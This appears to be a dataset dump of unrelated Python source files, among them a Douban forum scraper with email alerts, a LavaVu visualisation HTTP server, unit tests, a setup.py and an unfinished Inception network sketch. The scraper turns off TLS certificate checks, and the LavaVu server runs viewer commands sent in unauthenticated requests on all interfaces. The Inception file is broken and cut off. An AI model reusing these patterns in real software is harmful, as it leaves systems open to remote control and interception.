content
stringlengths 0
894k
| type
stringclasses 2
values |
---|---|
import getpass
import smtplib
from email.mime.text import MIMEText
from email.utils import formataddr
import urllib.request, urllib.parse, urllib.error
import ssl
import json
import time
import re
import os
import sys
# Email setting for notification
def Email(sender, password, recipient, emailsub, emailmsg, smtpsever, smtpport):
try:
msg = MIMEText(emailmsg, 'plain', 'utf-8')
msg['From'] = formataddr(['Catfood Reminder', sender])
msg['To'] = formataddr([recipient, recipient])
msg['Subject'] = emailsub
server = smtplib.SMTP_SSL(smtpsever, smtpport)
server.login(sender, password)
server.sendmail(sender,[recipient,],msg.as_string())
server.quit()
print('Succeed to send e-mail')
return True
except:
print('Failed to send e-mail')
def MacOsNotification(ostitle, osmsg):
if sys.platform == 'darwin':
os.system('osascript -e \'display notification "' + osmsg + '" sound name "default" with title "' + ostitle + '"\'')
def GetDobanTopic(keywords):
# Load saved topic data
try:
with open('record.json', 'r') as record_file:
record = json.load(record_file)
record_topics = record['topics']
lasttime = record['time']
record_file.close()
except:
record = dict()
record_topics = dict()
lasttime = "2020-01-01 00:00:00"
# Write new topic data
with open('record.json', 'w') as record_file:
# Request 1000pcs of topics from Douban
info = []
for i in range(0, 10):
# Ignore SSL certificate errors
ctx = ssl.create_default_context()
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
# Request data in JSON format
count = 100
start = i * count
url = 'https://api.douban.com/v2/group/656297/topics?start=' + str(start) + '&count=' + str(count)
header = {'User-Agent':'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36 Edg/79.0.309.56'}
req = urllib.request.Request(url = url, headers = header)
nowtime = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime())
try:
data = json.loads(urllib.request.urlopen(req, context = ctx).read())
except:
continue
# Filtrate concerned topics
for number in range(0, count):
topic = data['topics'][number]
content = topic['title'] + topic ['content']
if topic['updated'] <= lasttime:
break
if re.search(keywords, content, re.I|re.M|re.S) != None:
if topic['id'] not in record_topics.keys():
info.append(topic['updated'] + '\r\n' + topic['title'] + '\r\n' + topic['share_url'] + '\r\n' + '-' * 50)
print(topic['updated'] + '\n' + topic['title'] + '\n' + topic['share_url'] + '\n' + '-' * 50)
record_topics[topic['id']] = {'updated':topic['updated'], 'title':topic['title'], 'link':topic['share_url']}
if number < (count - 1):
break
record['time'] = nowtime
record['topics'] = record_topics
json.dump(record, record_file, ensure_ascii = False)
if len(info) == 0:
print('No new message ' + nowtime)
else:
message = str(len(info)) + ' new message(s) ' + nowtime
print(message)
MacOsNotification('Catfood Reminder', message)
Email(SenderAddress, Password, RecipientAddress, message, "\r\n".join(info), SMTPSever, SMTPPort)
record_file.close()
return
#Setup e-mail
while True:
# Login in E-mail
SenderAddress = input('Please input the sender\'s e-mail address: ')
Password = getpass.getpass('Please input the sender\'s e-mail password: ')
SMTPSever = input('Please input the sender\'s e-mail SMTP Sever address: ')
SMTPPort = input('Please input the sender\'s e-mail SMTP Port: ')
RecipientAddress = input('Please input the recipient\'s e-mail address: ')
#Test E-mail
testemail = Email(SenderAddress, Password, RecipientAddress, 'TEST MESSAGE', 'THIS IS TEST TEXT', SMTPSever, SMTPPort)
if testemail == True:
print('Valid e-mail setting, start searching...')
break
else:
print('Invalid e-mail setting is invalid, please retry')
# Search new topic every 10 min
while True:
GetDobanTopic(r'(开车).*?(go)') #change into your target keywords
print('Next search will start in 10 min')
time.sleep(600)
| python |
import unittest
from buscasrc.core.analyzer import Analyzer
class TestAnalyzer(unittest.TestCase):
def setUp(self):
self.analyzer = Analyzer()
def test_prepare_text(self):
text = "Conan, the barbarian is a great HQ. Conan, #MustRead!"
self.assertListEqual(self.analyzer.prepare_text(text), [
("conan", [0, 4]),
("barbarian", [1]),
("great", [2]),
("hq", [3]),
("mustread", [5])])
def test_execute_before_filters(self):
text = "Hello! Can i help you? Some things we have: rice, beans," \
" chicken, ..."
result = self.analyzer._execute_before_filters(text)
self.assertEquals(result,
"Hello Can i help you Some things we have rice"
" beans chicken ")
def test_execute_after_filters(self):
tokens_list = ["After", "all", "we", "will", "resist", "-", "JOHN"]
result = self.analyzer._execute_after_filters(tokens_list)
self.assertEquals(result, ["will", "resist", "john"])
def test_generate_tokens_with_positions(self):
tokens_list = ["john", "will", "resist", "john"]
result = self.analyzer._generate_tokens_with_positions(tokens_list)
self.assertEquals(result, [
("john", [0, 3]),
("will", [1]),
("resist", [2])])
def test_get_token_positions(self):
token = "conan"
tokens_list = ["conan", "barbarian", "axe", "conan", "sword"]
self.assertEquals(
self.analyzer._get_token_positions(token, tokens_list), [0, 3])
| python |
import yaml
from functools import lru_cache
from flask import current_app as app
from atst.utils import getattr_path
class LocalizationInvalidKeyError(Exception):
def __init__(self, key, variables):
self.key = key
self.variables = variables
def __str__(self):
return "Requested {key} and variables {variables} with but an error occured".format(
key=self.key, variables=self.variables
)
@lru_cache(maxsize=None)
def _translations_file():
file_name = "translations.yaml"
if app:
file_name = app.config.get("DEFAULT_TRANSLATIONS_FILE", file_name)
f = open(file_name)
return yaml.safe_load(f)
def all_keys():
translations = _translations_file()
keys = []
def _recursive_key_lookup(chain):
results = getattr_path(translations, chain)
if isinstance(results, str):
keys.append(chain)
else:
[_recursive_key_lookup(".".join([chain, result])) for result in results]
[_recursive_key_lookup(key) for key in translations]
return keys
def translate(key, variables=None):
translations = _translations_file()
value = getattr_path(translations, key)
if variables is None:
variables = {}
if value is None:
raise LocalizationInvalidKeyError(key, variables)
return value.format(**variables).replace("\n", "")
| python |
from .validate import Validate
__all__ = ["Valdate"]
| python |
"""Application tests."""
| python |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import sys
import inselect
REQUIREMENTS = [
# TODO How to specify OpenCV? 'cv2>=3.1.0',
'numpy>=1.11.1,<1.12',
'Pillow>=3.4.2,<3.5',
'python-dateutil>=2.6.0,<2.7',
'pytz>=2016.7',
'PyYAML>=3.12,<3.2',
'schematics>=1.1.1,<1.2',
'scikit-learn>=0.18.1,<0.19',
'scipy>=0.18.1,<0.19',
'unicodecsv>=0.14.1,<0.15',
]
SCRIPTS = ('export_metadata', 'ingest', 'read_barcodes', 'save_crops', 'segment')
setup_data = {
'name': 'inselect',
'version': inselect.__version__,
'author': (u'Lawrence Hudson, Alice Heaton, Pieter Holtzhausen, '
u'Stéfan van der Walt'),
'author_email': '[email protected]',
'maintainer': 'Lawrence Hudson',
'maintainer_email': '[email protected]',
'url': 'https://github.com/NaturalHistoryMuseum/inselect/',
'license': 'Modified BSD',
'description': inselect.__doc__,
'long_description': inselect.__doc__,
'packages': [
'inselect', 'inselect.gui', 'inselect.gui.plugins',
'inselect.gui.views', 'inselect.gui.views.boxes', 'inselect.lib',
'inselect.lib.templates', 'inselect.scripts',
],
'include_package_data': True,
'test_suite': 'inselect.tests',
'scripts': ['inselect/scripts/{0}.py'.format(script) for script in SCRIPTS],
'install_requires': REQUIREMENTS,
'extras_require': {
'gui': [
'ExifRead>=2.1.2', 'humanize>=0.5.1', 'psutil>=5.0.0',
'PyQt5>=5.6.0'
],
'barcodes': ['gouda>=0.1.13', 'pylibdmtx>=0.1.6', 'pyzbar>=0.1.3'],
'windows': ['pywin32>=220'],
'development': ['coveralls>=1.1', 'mock>=2.0.0', 'nose>=1.3.7'],
},
'entry_points': {
'gui_scripts':
['inselect = inselect.gui.app:main'],
'console_scripts':
['{0} = inselect.scripts.{0}:main'.format(script) for script in SCRIPTS],
},
'classifiers': [
'Development Status :: 4 - Beta',
'Topic :: Utilities',
'Topic :: Scientific/Engineering :: Bio-Informatics'
'Programming Language :: Python :: 3.5',
],
}
def setuptools_setup():
"""setuptools setup"""
from setuptools import setup
setup(**setup_data)
def _qt_files(site_packages):
"""Returns a list of tuples (src, dest) of Qt dependencies to be installed.
Elements are instances of Path.
site_packages should be an instance of Path to the site-packages directory.
IF we leave cx_Freeze to do its thing then the entirety of PyQt5, Qt5 and
uic are included in the installer. The only way to avoid horrible bloat is
to hand-tune which files we include.
This whole system is fucked beyond belief.
"""
from pathlib import Path
return [
# Qt DLLs
(
site_packages.joinpath('PyQt5/Qt/bin').joinpath(dep),
dep
)
for dep in ('Qt5Core.dll', 'Qt5Gui.dll', 'Qt5Widgets.dll')
] + [
# Qt plugins
(
site_packages.joinpath('PyQt5/Qt/plugins/platforms').joinpath(dep),
Path('platforms').joinpath(dep)
)
for dep in ('qwindows.dll',)
] + [
# PyQt extension modules
(
site_packages.joinpath('PyQt5').joinpath(dep),
Path('PyQt5').joinpath(dep)
)
for dep in ('__init__.py', 'Qt.pyd', 'QtCore.pyd', 'QtGui.pyd', 'QtWidgets.pyd')
]
def cx_setup():
"""cx_Freeze setup. Used for building Windows installers"""
import scipy
from pathlib import Path
from distutils.sysconfig import get_python_lib
from cx_Freeze import setup, Executable
from pylibdmtx import pylibdmtx
from pyzbar import pyzbar
# Useful paths
environment_root = Path(sys.executable).parent
site_packages = Path(get_python_lib())
project_root = Path(__file__).parent
# Files as tuples (source, dest)
include_files = [
# Evil, evil, evil
# cx_Freeze breaks pywintypes and pythoncom on Python 3.5
# https://bitbucket.org/anthony_tuininga/cx_freeze/issues/194/error-with-frozen-executable-using-35-and
(site_packages.joinpath('win32/lib/pywintypes.py'), 'pywintypes.py'),
(site_packages.joinpath('pythoncom.py'), 'pythoncom.py'),
# Binary dependencies that are not detected
(environment_root.joinpath('Library/bin/mkl_core.dll'), 'mkl_core.dll'),
(environment_root.joinpath('Library/bin/mkl_intel_thread.dll'), 'mkl_intel_thread.dll'),
(environment_root.joinpath('Library/bin/libiomp5md.dll'), 'libiomp5md.dll'),
# Stylesheet
(project_root.joinpath('inselect/gui/inselect.qss'), 'inselect.qss'),
] + [
# DLLs that are not detected because they are loaded by ctypes
(dep._name, Path(dep._name).name)
for dep in pylibdmtx.EXTERNAL_DEPENDENCIES + pyzbar.EXTERNAL_DEPENDENCIES
] + _qt_files(site_packages)
# Convert instances of Path to strs
include_files = [(str(source), str(dest)) for source, dest in include_files]
# Directories as strings
include_files += [
# Fixes scipy freeze
# http://stackoverflow.com/a/32822431/1773758
str(Path(scipy.__file__).parent),
]
# Packages to exclude.
exclude_packages = [
str(p.relative_to(site_packages)).replace('\\', '.') for p in
site_packages.rglob('*/tests')
]
setup(
name=setup_data['name'],
version=setup_data['version'],
options={
'build_exe': {
'packages':
setup_data.get('packages', []) + [
'urllib', 'sklearn.neighbors', 'win32com.gen_py',
'win32timezone',
],
'excludes': [
# '_bz2', # Required by sklearn
'_decimal', '_elementtree', '_hashlib', '_lzma',
'_ssl', 'curses',
'distutils', 'email', 'http', 'lib2to3', 'mock', 'nose',
'PyQt5',
# 'pydoc', # Required by sklearn
'tcl', 'Tkinter', 'ttk', 'Tkconstants',
# 'unittest', # Required by numpy.core.multiarray
'win32com.HTML', 'win32com.test', 'win32evtlog', 'win32pdh',
'win32trace', 'win32ui', 'win32wnet',
'xml', 'xmlrpc',
'inselect.tests',
] + exclude_packages,
'includes': [
],
'include_files': include_files,
'include_msvcr': True,
'optimize': 2,
},
'bdist_msi': {
'upgrade_code': '{fe2ed61d-cd5e-45bb-9d16-146f725e522f}'
}
},
executables=[
Executable(
script='inselect/scripts/inselect.py',
targetName='inselect.exe',
icon='icons/inselect.ico',
base='Win32GUI',
shortcutName='Inselect', # See http://stackoverflow.com/a/15736406
shortcutDir='ProgramMenuFolder'
)
] + [
Executable(
script='inselect/scripts/{0}.py'.format(script),
targetName='{0}.exe'.format(script),
icon='icons/inselect.ico',
base='Console'
)
for script in SCRIPTS
],
)
if (3, 5) <= sys.version_info:
if 'bdist_msi' in sys.argv:
cx_setup()
else:
setuptools_setup()
else:
sys.exit('Only Python >= 3.5 is supported')
| python |
# get camera list
import logging
from datetime import datetime
from typing import Any
from typing import List
import requests
from protect_archiver.dataclasses import Camera
def get_camera_list(session: Any, connected: bool = True) -> List[Camera]:
cameras_uri = f"{session.authority}{session.base_path}/cameras"
response = requests.get(
cameras_uri,
cookies={"TOKEN": session.get_api_token()},
verify=session.verify_ssl,
)
if response.status_code != 200:
print(f"Error while loading camera list: {response.status_code}")
return []
logging.info(f"Successfully retrieved data from {cameras_uri}")
cameras = response.json()
camera_list = []
for camera in cameras:
cameraData = Camera(id=camera["id"], name=camera["name"], recording_start=0)
if camera["stats"]["video"]["recordingStart"]:
cameraData.recording_start = datetime.utcfromtimestamp(
camera["stats"]["video"]["recordingStart"] / 1000
)
camera_list.append(cameraData)
logging.info(
"Cameras found:\n{}".format(
"\n".join(f"- {camera.name} ({camera.id})" for camera in camera_list)
)
)
return camera_list
| python |
# -*- coding: utf-8 -*-
"""
Created on Thu Apr 26 15:15:55 2018
@author: Madhur Kashyap 2016EEZ8350
"""
import os
import sys
import logging
import numpy as np
from functools import partial
from keras.optimizers import Adadelta
from sklearn.metrics import confusion_matrix
prog = os.path.basename(__file__)
codedir = os.path.join(os.path.dirname(__file__),"..","code")
sys.path.append(codedir)
from Utils import *
from PlotUtils import *
from SpeechCorpus import Timit
from AcousticModels import *
from TrainUtils import train_model,weighted_categorical_crossentropy
from AcousticDataGenerator import AcousticDataGenerator
#logfile = prog+'.log'
#rootlog = initlog(logfile,level=logging.DEBUG);
#rootlog.info('Starting new session');
if len(sys.argv)>1:
corpus = Timit(root=sys.argv[1]);
else:
corpus = Timit(root='C:/Users/nxa17016/ML/pyml/RNN/assignment3/dataset')
corpus.split_validation();
#rootlog.info(corpus.report_statistics(folder='report/images'));
adg = AcousticDataGenerator(corpus=corpus,mbatch_size=32,
mfcc_win=0.0125,mfcc_step=0.005,
ce_encoding_mode='best',
mode='phoneme', model_silence=True);
adg.fit_train(n_samples=1000);
model = bidi_lstm(input_dim=adg.feature_dim,units=20,output_dim=adg.n_classes,
batchnorm=True,after_dropout=0.0);
train_model(model,adg.train_generator(),adg.valid_generator(),'bidi_gru_20',
epochs=1,steps_per_epoch=adg.nb_train-100,validation_steps=adg.nb_valid-10,
verbose=1,save_period=0,optimizer=Adadelta(),report_stats=True,
class_names=list(adg.outmap[0].keys())); | python |
from connect4 import Connect4Board
from connect4 import GameState
from connect4 import Player
def test_win_condition():
# check vertical
for row in range(6-3):
for col in range(7):
game = Connect4Board()
for i in range(row, row+4):
game.board[i][col] = Player.PLAYER_1
if not game.check_win(Player.PLAYER_1):
return False, "Failed vertical win condition for player 1", game
game = Connect4Board()
for i in range(row, row+4):
game.board[i][col] = Player.PLAYER_2
if not game.check_win(Player.PLAYER_2):
return False, "Failed vertical win condition for player 2", game
# check horizontal
for row in range(6):
for col in range(7-3):
game = Connect4Board()
for i in range(col, col+4):
game.board[row][i] = Player.PLAYER_1
if not game.check_win(Player.PLAYER_1):
return False, "Failed horizontal win condition for player 1", game
game = Connect4Board()
for i in range(col, col+4):
game.board[row][i] = Player.PLAYER_2
if not game.check_win(Player.PLAYER_2):
return False, "Failed horizontal win condition for player 2", game
# check diagonal
for row in range(6-3):
for col in range(7-3):
game = Connect4Board()
for i in range(4):
game.board[row+i][col+i] = Player.PLAYER_1
if not game.check_win(Player.PLAYER_1):
return False, "Failed diagonal / win condition for player 1", game
game = Connect4Board()
for i in range(4):
game.board[row+i][col+i] = Player.PLAYER_2
if not game.check_win(Player.PLAYER_2):
return False, "Failed diagonal / win condition for player 2", game
for row in range(6-3):
for col in range(3,7):
game = Connect4Board()
for i in range(4):
game.board[row+i][col-i] = Player.PLAYER_1
if not game.check_win(Player.PLAYER_1):
return False, "Failed diagonal \ win condition for player 1:", game
game = Connect4Board()
for i in range(4):
game.board[row+i][col-i] = Player.PLAYER_2
if not game.check_win(Player.PLAYER_2):
return False, "Failed diagonal \ win condition for player 2", game
return True, None, None
if __name__ == "__main__":
all_tests_pass = True
test_win_condition_pass, error, game = test_win_condition()
if not test_win_condition_pass:
print("Failed win condition test! Error:", error)
game.print_board()
all_tests_pass = False
if all_tests_pass:
print("All tests pass!")
| python |
import urllib
import os
import threading
import time
import errno
from functools import partial
import weakref
import base64
import json
import socket
from socketserver import ThreadingMixIn
from http.server import SimpleHTTPRequestHandler, HTTPServer
from urllib.parse import unquote
from urllib.parse import urlparse
from urllib.parse import parse_qs
"""
HTTP Server interface
"""
class LVRequestHandler(SimpleHTTPRequestHandler, object):
def __init__(self, viewer_weakref, *args, **kwargs):
#Used with partial() to provide the viewer object
try:
self._lv = viewer_weakref
super(LVRequestHandler, self).__init__(*args, **kwargs)
except (IOError) as e:
pass #Just ignore IO errors on server
if e.errno == errno.EPIPE:
# EPIPE error, ignore
pass
elif e.errno == errno.EPROTOTYPE:
# MacOS "Protocol wrong type for socket" error, ignore
pass
else:
raise e
def serveResponse(self, data, datatype):
try:
#Serve provided data, with error check for SIGPIPE (broken connection)
self.send_response(200)
self.send_header('Content-type', datatype)
self.send_header('Access-Control-Allow-Origin', '*')
self.send_header('x-colab-notebook-cache-control', 'no-cache') #Colab: disable offline access cache
self.end_headers()
if data:
self.wfile.write(data)
#This specific error sometimes occurs on windows, ConnectionError is the base class and covers a few more
#except (IOError,ConnectionAbortedError) as e:
# if isinstance(e,ConnectionAbortedError):
except (IOError,ConnectionError) as e:
if isinstance(e,ConnectionError):
pass
elif e.errno == errno.EPIPE:
# EPIPE error, ignore
pass
else:
raise e
def do_HEAD(self):
self.serveResponse(None, 'text/html')
def do_POST(self):
#Always interpret post data as commands
#(can perform other actions too based on self.path later if we want)
data_string = self.rfile.read(int(self.headers['Content-Length']))
self.serveResponse(b'', 'text/plain')
#cmds = str(data_string, 'utf-8') #python3 only
try: #Python3
from urllib.parse import unquote
data_string = unquote(data_string)
except: #Python2
from urllib import unquote
data_string = unquote(data_string).decode('utf8')
cmds = str(data_string.decode('utf-8'))
#Run viewer commands
self._execute(cmds)
def do_GET(self):
lv = self._get_viewer()
parsed = urlparse(self.path)
query = parse_qs(parsed.query)
def img_response():
resp = None
if 'width' in query and 'height' in query:
resp = lv.jpeg(resolution=(int(query['width'][0]), int(query['height'][0])))
elif 'width' in query:
resp = lv.jpeg(resolution=(int(query['width'][0]), 0))
else:
resp = lv.jpeg()
#Ensure the response is valid before serving
if resp is not None:
self.serveResponse(resp, 'image/jpeg')
if self.path.find('image') > 0:
img_response()
elif self.path.find('command=') > 0:
pos1 = self.path.find('=')
pos2 = self.path.find('?')
if pos2 < 0: pos2 = len(self.path)
cmds = unquote(self.path[pos1+1:pos2])
#Run viewer commands
self._execute(cmds)
#Serve image or just respond 200
if self.path.find('icommand=') > 0:
img_response()
else:
self.serveResponse(b'', 'text/plain')
elif self.path.find('getstate') > 0:
state = lv.app.getState()
self.serveResponse(bytearray(state, 'utf-8'), 'text/plain; charset=utf-8')
#self.serveResponse(bytearray(state, 'utf-8'), 'text/plain')
elif self.path.find('connect') > 0:
if 'url' in query:
#Save first valid connection URL on the viewer
url = query['url'][0]
if len(lv._url) == 0:
lv._url = url
uid = id(lv)
self.serveResponse(bytearray(str(uid), 'utf-8'), 'text/plain; charset=utf-8')
elif self.path.find('key=') > 0:
pos2 = self.path.find('&')
cmds = unquote(self.path[1:pos2])
lv.commands('key ' + cmds, True)
self.serveResponse(b'', 'text/plain')
elif self.path.find('mouse=') > 0:
pos2 = self.path.find('&')
cmds = unquote(self.path[1:pos2])
lv.commands('mouse ' + cmds, True)
self.serveResponse(b'', 'text/plain')
elif len(self.path) <= 1:
#Root requested, returns interactive view
w = lv.control.Window(align=None, wrapper=None)
code = lv.control.show(True, filename="")
self.serveResponse(bytearray(code, 'utf-8'), 'text/html; charset=utf-8')
else:
return SimpleHTTPRequestHandler.do_GET(self)
#Serve files from lavavu html dir
def translate_path(self, path):
lv = self._get_viewer()
if not os.path.exists(path):
#print(' - not found in cwd')
if path[0] == '/': path = path[1:]
path = os.path.join(lv.htmlpath, path)
if os.path.exists(path) and os.path.isfile(path):
#print(' - found in htmlpath')
return path
else:
#print(' - not found in htmlpath')
return SimpleHTTPRequestHandler.translate_path(self, self.path)
else:
return SimpleHTTPRequestHandler.translate_path(self, path)
#Stifle log output
def log_message(self, format, *args):
return
def _get_viewer(self):
#Get from weak reference, if deleted raise exception
lv = self._lv()
if not lv:
self._closing = True
raise(Exception("Viewer not found"))
return lv
def _execute(self, cmds):
lv = self._get_viewer()
if len(cmds) and cmds[0] == '_':
#base64 encoded commands or JSON state
cmds = str(base64.b64decode(cmds).decode('utf-8'))
#cmds = str(base64.b64decode(cmds), 'utf-8')
#Object to select can be provided in preceding angle brackets
selobj = None
if cmds[0] == '<':
pos = cmds.find('>')
selobj = lv.objects[cmds[1:pos]]
cmds = cmds[pos+1:]
#Execute commands via python API by preceding with '.'
done = False
if cmds[0] == '.':
attr = cmds.split()[0][1:]
pos = cmds.find(' ')
params = cmds[pos+1:]
if selobj:
#Call on Object
func = getattr(selobj, attr)
if func and callable(func):
func(params)
done = True
else:
#Call on Viewer
func = getattr(lv, attr)
if func and callable(func):
func(params)
done = True
elif cmds[0] == '$':
#Requests prefixed by '$' are sent
#from property collection controls
#format is $ID KEY VALUE
# - ID is the python id() of the properties object
# All properties collections are stored on their parent
# object using this id in the _collections dict
# - KEY is the property name key to set
# - VALUE is a json string containing the value to set
S = cmds.split()
target = S[0][1:]
if target in lv._collections:
#Get from _collections by id (weakref)
props = lv._collections[target]()
props[S[1]] = json.loads(S[2])
#Check for callback - if provided, call with updated props
func = getattr(props, 'callback')
if func and callable(func):
func(props)
#Default, call via lv.commands() scripting API
if not done:
if selobj:
selobj.select()
lv.commands(cmds)
#Optional thread per request version:
class ThreadingHTTPServer(ThreadingMixIn, HTTPServer):
pass
"""
HTTP Server manager class
"""
class Server(threading.Thread):
def __init__(self, viewer, port=None, ipv6=False, retries=100):
self.host = 0
if port is None:
port = 8080
self._closing = False
#Allow viewer to be garbage collected
self.viewer = weakref.ref(viewer)
self.port = port
self.retries = retries
self.maxretries = retries
self.ipv6 = ipv6
super(Server, self).__init__()
self.daemon = True #Place in background so will be closed on program exit
self._cv = threading.Condition()
def handle(self):
try:
httpd.handle_request()
except (socket.exception) as e:
#print(str(e))
pass
def run(self):
httpd = None
HTTPServer.allow_reuse_address = False
try:
# We "partially apply" our first argument to get the viewer object into LVRequestHandler
handler = partial(LVRequestHandler, self.viewer)
if self.ipv6:
HTTPServer.address_family = socket.AF_INET6
hosts = ['::', 'localhost', '::1']
host = hosts[self.host]
#httpd = HTTPServer((host, self.port), handler)
httpd = ThreadingHTTPServer((host, self.port), handler)
else:
HTTPServer.address_family = socket.AF_INET
hosts = ['0.0.0.0', 'localhost', '127.0.0.1']
host = hosts[self.host]
#httpd = HTTPServer((host, self.port), handler)
httpd = ThreadingHTTPServer(('0.0.0.0', self.port), handler)
#print("Server running on host %s port %s" % (host, self.port))
#Sync with starting thread here to ensure server thread has initialised before it continues
with self._cv:
self._cv.notifyAll()
# Handle requests
#print("Using port: ", self.port)
# A timeout is needed for server to check periodically if closing
httpd.timeout = 0.05 #50 millisecond timeout
while self.viewer() is not None and not self._closing:
httpd.handle_request()
except (Exception) as e:
self.retries -= 1
if self.retries < 1:
print("Failed to start server, max retries reached")
#Try another port
if e.errno == errno.EADDRINUSE: #98
self.port += 1
#Try again
self.run()
elif e.errno == errno.EAFNOSUPPORT: #97 : Address family not supported by protocol
#Try next host name/address
self.host += 1
if self.host > 2:
#Try again without ipv6?
if self.ipv6:
self.ipv6 = False
else:
self.ipv6 = True
self.host = 0
#Try again
self.run()
else:
print("Server start failed: ",e, e.errno, self.port)
def serve(viewer, port=None, ipv6=False, retries=100):
s = Server(viewer, port, ipv6, retries)
#Start the thread and wait for it to finish initialising
with s._cv:
s.start()
s._cv.wait()
return s
#Ignore SIGPIPE altogether (does not apply on windows)
import sys
if sys.platform != 'win32':
from signal import signal, SIGPIPE, SIG_IGN
signal(SIGPIPE, SIG_IGN)
"""
Main entry point - run server and open browser interface
"""
if __name__ == '__main__':
import lavavu
lv = lavavu.Viewer()
#lv.animate(1) #Required to show viewer window and handle mouse/keyboard events there too
lv.browser()
lv._thread.join() #Wait for server to quit
| python |
from twisted.trial import unittest
from twisted.internet import defer
from nodeset.core import config
from nodeset.common.twistedapi import NodeSetAppOptions
class ConfigurationTest(unittest.TestCase):
def setUp(self):
cfg = NodeSetAppOptions()
cfg.parseOptions(['-n', '--listen', 'localhost:4333',
'--dispatcher-url', 'pbu://localhost:5333/dispatcher'])
self.config = config.Configurator()
self.config._config = cfg
def testListenParam(self):
self.assertTrue(self.config['listen'] == 'localhost:4333')
def testDispatcherParam(self):
self.assertTrue(self.config['dispatcher-url'] == 'pbu://localhost:5333/dispatcher')
def testAnotherInstance(self):
c = config.Configurator()
self.assertTrue(c['listen'] == 'localhost:4333')
def testUpdate(self):
self.config['new_option'] = 'value'
self.assertTrue(self.config['new_option'] == 'value')
def testAnotherRoutine(self):
def anotherRoutine(d):
c = config.Configurator()
self.assertTrue(c['listen'] == 'host.name.com:4111')
self.config['listen'] = 'host.name.com:4111'
d = defer.Deferred()
d.addCallback(anotherRoutine)
d.callback(None)
def testPassingAsArgument(self):
def routine(conf):
c = config.Configurator()
self.assertTrue(c == conf)
d = defer.Deferred()
d.addCallback(routine)
d.callback(config.Configurator())
def tearDown(self):
del self.config | python |
acceptable_addrs = ["192.168.0.16"]
| python |
# Generated by Django 2.1.5 on 2019-01-27 00:11
from django.db import migrations, models
import django.db.models.deletion
import simplemde.fields
import uuid
class Migration(migrations.Migration):
initial = True
dependencies = []
operations = [
migrations.CreateModel(
name="Event",
fields=[
(
"id",
models.AutoField(
auto_created=True,
primary_key=True,
serialize=False,
verbose_name="ID",
),
),
(
"uuid",
models.UUIDField(default=uuid.uuid4, editable=False, unique=True),
),
("title", models.CharField(max_length=200)),
(
"description",
simplemde.fields.SimpleMDEField(
blank=True, max_length=2000, null=True
),
),
("invitee_capacity", models.PositiveIntegerField(default=0)),
("event_day", models.DateField()),
("initial_hour", models.TimeField()),
("end_hour", models.TimeField()),
("place_name", models.CharField(max_length=200)),
("open_street_map_url", models.URLField()),
],
),
migrations.CreateModel(
name="Invitee",
fields=[
(
"id",
models.AutoField(
auto_created=True,
primary_key=True,
serialize=False,
verbose_name="ID",
),
),
(
"uuid",
models.UUIDField(default=uuid.uuid4, editable=False, unique=True),
),
("enrolled_at", models.DateTimeField(auto_now_add=True)),
("cancelled", models.BooleanField(default=False)),
(
"event",
models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE, to="events.Event"
),
),
],
),
]
| python |
from .operator_bot import main
main()
| python |
from episerver.vanir.configuration import Configuration
from azure.common.client_factory import get_client_from_json_dict
from azure.mgmt.resource import ResourceManagementClient
class AddEnvironmentCommand:
def __init__(self):
config = Configuration()
self.resource_client = get_client_from_json_dict(ResourceManagementClient, config.get_configuration())
def execute(self, args):
resource_group = self.resource_client.resource_groups.create_or_update(args.name, { "location": f"{args.location}" })
print(f"Provisioned resource group {resource_group.name} in the {resource_group.location} region") | python |
from tensorize import *
class InceptionResnetV1(Model):
def inference(self, inputs, output):
stem(inputs, outputs)
for x in xrange(4):
inceptionA()
reductionA()
for x in xrange(7):
inceptionB()
reductionB()
for x in xrange(3):
inceptionC()
AveragePooling()
Dropout(0.8)
CategoricalPredictionOutput(output)
def train(self, outputs):
CategoricalCrossEntropy()
CategoricalAccuracy(outputs)
GradientDescentOptimizer()
class InceptionResnetV2(Model):
def inference(self, inputs, output):
stem(inputs, outputs)
for x in xrange(4):
inceptionA()
reductionA()
for x in xrange(7):
inceptionB()
reductionB()
for x in xrange(3):
inceptionC()
AveragePooling()
Dropout(0.8)
CategoricalPredictionOutput(output)
def train(self, outputs):
CategoricalCrossEntropy()
CategoricalAccuracy(outputs)
GradientDescentOptimizer()
def stem(inputs, outputs):
BatchImageInput(inputs)
Convolution3x3(filters=32)
Convolution3x3(filters=32)
Convolution3x3(filters=64)
with ParallelBlock() as parallel:
with parallel:
MaxPooling2D()
with parallel:
Convolution3x3(filters=64)
FilterConcat()
with ParallelBlock() as parallel:
with parallel:
Convolution1x1(filters=64)
Convolution3x3(filters=96)
with parallel:
Convolution1x1(filters=64)
Convolution2D([7, 1], filters=64)
Convolution2D([1, 7], filters=64)
Convolution3x3(filters=96)
FilterConcat()
with ParallelBlock() as block:
with block:
MaxPooling2D()
with block:
Convolution3x3(filters=64)
FilterConcat()
def inceptionA():
with ParallelBlock() as parallel:
with parallel:
AveragePooling()
Convolution1x1(filters=96)
with parallel:
Convolution1x1(filters=96)
with parallel:
Convolution1x1(filters=64)
Convolution3x3(filters=96)
with parallel:
Convolution1x1(filters=64)
Convolution3x3(filters=96)
Convolution3x3(filters=96)
FilterConcat()
def inceptionB():
with ParallelBlock() as parallel:
with parallel:
AveragePooling()
Convolution1x1(filters=128)
with parallel:
Convolution1x1(filters=384)
with parallel:
Convolution1x1(filters=192)
Convolution2D([1, 7], filters=224)
Convolution2D([1, 7], filters=256)
with parallel:
Convolution1x1(filters=192)
Convolution2D([1, 7], filters=192)
Convolution2D([7, 1], filters=224)
Convolution2D([1, 7], filters=224)
Convolution2D([7, 1], filters=256)
FilterConcat()
def inceptionC():
with ParallelBlock() as parallel:
with parallel:
AveragePooling()
Convolution1x1(filters=256)
with parallel:
Convolution1x1(filters=256)
with parallel:
Convolution1x1(filters=384)
with ParallelBlock() as parallel_inner:
with parallel_inner:
Convolution2D([1, 3], filters=256)
with parallel_inner:
Convolution2D([3, 1], filters=256)
with parallel:
Convolution1x1(filters=384)
Convolution2D([1, 3], filters=384)
Convolution2D([3, 1], filters=512)
FilterConcat()
def reduceA(n, l, k, m):
with ParallelBlock() as parallel:
with parallel:
MaxPooling2D([3, 3])
with parallel:
Convolution3x3(n)
with parallel:
Convolution1x1(filters=k)
Convolution3x3(filters=l)
Convolution3x3(filters=m)
FilterConcat()
def reduceB():
